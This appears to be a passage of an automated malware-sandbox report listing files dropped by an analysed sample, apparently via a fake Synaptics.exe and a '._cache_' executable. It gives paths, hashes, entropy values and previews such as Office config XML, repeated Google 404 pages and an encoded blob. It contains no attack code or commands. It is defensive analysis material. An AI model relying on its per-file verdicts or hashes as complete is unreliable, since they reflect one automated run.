                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\76A735AA-7941-42FC-A093-50DC74F5224B

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):147717
                                                                                                                                                                                                                          Entropy (8bit):5.3591948483694365
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:gcQW/gxgB5B3guw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:SHQ9DQW+zIXLI
                                                                                                                                                                                                                          MD5:B6DC8D4E2DFF6941F586C5A9B70A2113
                                                                                                                                                                                                                          SHA1:921C12EDEBDF9568A219D466BE57A60B52F1CE39
                                                                                                                                                                                                                          SHA-256:7D4B72B2F6CB7F91F5B77DCEF0C9361B3F10AE6E6DF4FF4195DE0DFDA205B733
                                                                                                                                                                                                                          SHA-512:535D53BA0D44D6306C5C26386A15F3ACF3B9AD4CEE7BCF095C85F086C95DE84997A268B353D89B53B25CCF6EA415ECD48F26D2F7B53E6E6FFE35F3AF083FF764
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-05-27T02:38:11">.. Build: 16.0.15322.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22204
                                                                                                                                                                                                                          Entropy (8bit):5.600843010610084
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:FtMjDPC0cpuZQuKr+pu5SYZ2jilJHVptQcvrg3MrBInYM05KfFRV7SJ3dK5ZQvnH:kguehpgmlJH/KW6waDiOp2O+H
                                                                                                                                                                                                                          MD5:9DC3A55F3E37D2EF2B4AEECA7114D94D
                                                                                                                                                                                                                          SHA1:B3F041B7C6B144EECEA599808D9CD54FE2B626BE
                                                                                                                                                                                                                          SHA-256:BE415E1129D4EBAF6A3E5DBF038CBBAC04CFD0DA620DA74467E2C316CC0FE27A
                                                                                                                                                                                                                          SHA-512:811712D2A4EEABABC78BE22C6842CA55673322E54695A7EECD6EC31CFF944B57495FC21D83FE8ABDD62271032574B1E33785F1B5E6120306DFF26AE4C1945EEB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:@...e...........h...................L.K...}..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.4................Zg5..:O..g..q..........System.Xml..@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6D6YYf5.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.263193514344487
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+z+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B5C49CC9E8DC5BB7979D44D737899DB3
                                                                                                                                                                                                                          SHA1:1CB0774BDC9C65E0A64F7FA8D823794C9D8A9161
                                                                                                                                                                                                                          SHA-256:D2FE0124264D63EA2EB3FF79940B41F1985012D54E84F3570C15EE9A1EB1EB48
                                                                                                                                                                                                                          SHA-512:6841EAED08CDD4C4BE9CC21046B1C2D93AFF0B7A34FE60A8361221B9144693E0EEA3B0A5830BCEBE6E8A333CCF515846643D590AF7B263CAC2F298D98234999F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\79Qsp1R.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.254010098815258
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0xySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Ky+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4309ACA8FE965CECD1BE6514FFECE3B4
                                                                                                                                                                                                                          SHA1:7D3CB895EA60DF7EABC9F6782A550855CAA46B85
                                                                                                                                                                                                                          SHA-256:1333C16A831C61707FB22D3D5C0C5538697F404F5D48873946721B260A66963F
                                                                                                                                                                                                                          SHA-512:CAFC30C2070FA594DA4F88627A7AC9AA9B1CEC5C8BE24A42DCBF92B8B1F0E78A2DCE8CCBF402F1510A4EC446A7A683D7D84A0775DCFF29B6020473C424F5B0A2
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uxH3n6qsdeVxHxiqEFvg1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9nIC29m.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266160886679918
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0lWDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ym+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B7701E37A612013DF67A0990CE2D81BC
                                                                                                                                                                                                                          SHA1:0814185B4905AEBCE392297D16D0CFCBC864E140
                                                                                                                                                                                                                          SHA-256:CE9010DF0F130D27BAE288151624008B28320FCC19690062AF3F7431538F7F73
                                                                                                                                                                                                                          SHA-512:3CAD5A2527F1C0F0AFABADDA57CA4BB39B3E4E956D0151D478DCC49FBE5FEA96FD74F383BE10E47DA7F45E34F607BF2964CF9CE4E1C970FE5949695A90AEA083
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BzfEXWApUaIy2onkKQoLTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\A74oXdM.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.262537312649583
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0ZySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+b+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:12084AEDF546294AFA8CB823217F89A1
                                                                                                                                                                                                                          SHA1:38F8AFC0D5FD9F242496295C97B53F353D171DDD
                                                                                                                                                                                                                          SHA-256:A6CF48D32BC467AA5B5A963653525AFF89DF1540289870BA462D4D9B8C46F169
                                                                                                                                                                                                                          SHA-512:C60DCCA7B8973A399442115C678B6E87BAFC0A5DED5C67566D92488DC3B94A95F1B470A189D9B86BC1B9BBD9758F3DBCA9EE5F24F181A8ADC143C5319FE30B2D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AyQD7gHrQazz1KSmlkMQvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\AEB8Tw9.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.260631526490981
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:2EC6D02BC24F3CBCF138E77C18D63CE2
                                                                                                                                                                                                                          SHA1:4AF05824DF9A13E2B5516E620F724839CA4515BF
                                                                                                                                                                                                                          SHA-256:EA55864C1F586EEC4423D483518C866D583552A7B23783A7DD23BDDCCC63DFEA
                                                                                                                                                                                                                          SHA-512:AEDF9BA99E0F5CE5B6F05D2F14DAF861669A7322C2D89B70603509D0A6107EFE91DF3CC27E81CF0943EFC3D6498365350683CED44117975A9EE3545D8C158B2D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GoTjizcKOBGRGwE7giIZgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Ap7UmLD.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.25999015877655
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:CDAD74A4440693FE98FF06D1C92F8264
                                                                                                                                                                                                                          SHA1:04E96DB5A6D5DF6C8E6ABD706D9F85AFE32C1691
                                                                                                                                                                                                                          SHA-256:0CDA8EAA8B2B3B3C8CAED6449AFD34516F1AC6BD3EA2E3FE7853CA563F7BD624
                                                                                                                                                                                                                          SHA-512:6DED5DD7ECFF6E017839C772DFB464B815301496909178016DF7BADD8E6B42A31027C5B581B836FF5170437850F9E2CCBEC5841192ABFF0A3E998750752FD929
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HqInpAb4q-UA0p5Ap9EuAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\CrVbcG3.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.265093555739085
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:40541C44E1A2C92BBB011980646390BD
                                                                                                                                                                                                                          SHA1:E8CB7690FAEEA6EB26377114E68AA888E08EDB5D
                                                                                                                                                                                                                          SHA-256:0945F65B1D726D99B2AF379BD9345FDF5CF72D90E67F41B0A2D196F7C9BBC0B9
                                                                                                                                                                                                                          SHA-512:1FBA270CA7A4FDF7EFF856F7460F6579399E4F9E53F78B4D58A0A47F6781601266C5C8DEFA349F157A8B4C44616D3E5B9C6695F5A7990D8DAB26F3518D872284
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XKD48708HUjfc2xAbsoU9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Forfrelses5.kni

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):387599
                                                                                                                                                                                                                          Entropy (8bit):7.923786371334464
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:zqGNqFRp81ckmvkdQ3Px8PjVWLAefmp88Q7YBy69ZrNlCTif9zUCIpkbrZFV:ea5svkdQfx8PjVWUem2YBy6LrNITiVzz
                                                                                                                                                                                                                          MD5:4AAB1798D3B3A95F833CB8A3EBBD45B5
                                                                                                                                                                                                                          SHA1:07C3BD47B41080B20A7D05543E8B055AD0CAA3E1
                                                                                                                                                                                                                          SHA-256:3B171F2E59DFDFDA8F1198FF352A15E65ADCED5F7148795369489179A58D6DB0
                                                                                                                                                                                                                          SHA-512:764B2D517ADA103BAC727775DCAE3F2AEF1E38649587EFF5A3D31E039E1E2C519054082F8EF508E71B3A32D5A2AAC531601867A3A3CF9D4BA5C677F47A01F32A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:bH..v.......f.O$4.:qMo.2..d....VY]..=....R.T.jL..]kRI)...../.=p....w..v.a.o.mE.9.m|.F.v..D..!SLG.Ry.%...u......W.....J{.?.']PE....!9k.dk...CbY.q....V$.rw:..?Ex...(.:.b.d<.hi.....:.:.x,Y. ....N3.1..A...y.......b....D._.j.vw...........f2........c(.g.u...f9I.5.....N...{.{.\.G.... 2x.I.i..p<4MI......H.T...K..{...P.3t3..;. .V[NhAj...4..D.....ZS...a#.(..~...\l.l.$.Ia.....L....{/.S..{r.\...O.B-.F....s....^J.#.H...V..u..vc.%.K.}.PQB...t.q..+[..]@pClf2...r:..c..._@..,a:.MN.......k...ER.c.....%._bj.s.2V,.U....I....e.[....z..o+..0A.#.@4...1,.d.........K.tO.+.xf"....Y.i.%....X..nk.....z.5.!xq.{.....TP......l['...c%f..s.,.......x..{..6m.~[&.'{p......|.N.9...n,..$:]"..r....Z....k.a..<.p..\...^8\*...k..H(]...4.6..c.A.S}...n(I.p..)|:..h.R6..6..!.v......? ...ar..."_...vCA.qsH.f..g...Y)......0<U.V..~....B.R(a.&.:s..q..{jU41x.b...`...9.s;.6..C8...x.......X......v.;w.A.O.....P6M...P.6h....{....z.@G........Zs...j.p&./..|2.AM....O,...HU?.D#2..(..N=.._m.}.$g.^.z...yzV

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Fp5pWOv.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.264699310392705
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+035YDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+YY+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:0E40F1B3BE2664251A057C3C25F8B40C
                                                                                                                                                                                                                          SHA1:CF6DDA64F15CAFE718359A496DF91EBA631901E2
                                                                                                                                                                                                                          SHA-256:E99333046DF17A07F917AE29132218E35857E325FB2F40F81ED003FBB281D8B4
                                                                                                                                                                                                                          SHA-512:3FC5D03F616AA47D07026A985C07B21B0FF0F5C47377AD0D4D973E9D988E217EC17A63AABAFB94863DFB12E6CF4DC318B7C091262A8B3E3E356AA376FAB5FFF4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jZZUsfKVxcF-KtVNwQ9-lQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\HEaQKbm.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.255533734344521
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+f+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:DD6782F34D39587DF9A63777FAECA595
                                                                                                                                                                                                                          SHA1:D3935DE2AC954B7F19372020F25E844EED74450F
                                                                                                                                                                                                                          SHA-256:34C81BAAE33FFAF55720E9575AF7F203887FACD303DE421ABBDE4CAD946DF5B9
                                                                                                                                                                                                                          SHA-512:E7D097D9BB845E593BFFAE20F04969BD0C82D4D23E816DC8C05A359CCA68CED2F29E70DB0457CE7D86B5B51C9721324BDD6AFEE270D3ABC7B0D21C7EE18775AC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LeWMoGB--_KAeopU33bojw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Hk28YM9.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.27651127842957
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:9E40F5F14B4F270901DA7439511A82A3
                                                                                                                                                                                                                          SHA1:D5F454B26EDFDE8939F94AEA30D5C32D39BC9A25
                                                                                                                                                                                                                          SHA-256:E01B891EB7E80E95E7AD94B530E4F2246A0EC1DF87CAE6E629D0B76223F8DE84
                                                                                                                                                                                                                          SHA-512:1BB1CDC37A212C6503A7BDFDC73DA742CEF271DFE8DBD62A0BADB1DA2398DCCD617693809312B4F66BF6EAB6DBD111B99BF950A099FB911487FCAE5B933B18B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u_EXop8B6LA8H-VJffKUSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\JcTixxK.ini

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.259950883259115
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+8+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:7EE89D6391026DF4F7831C95A0D0D2D3
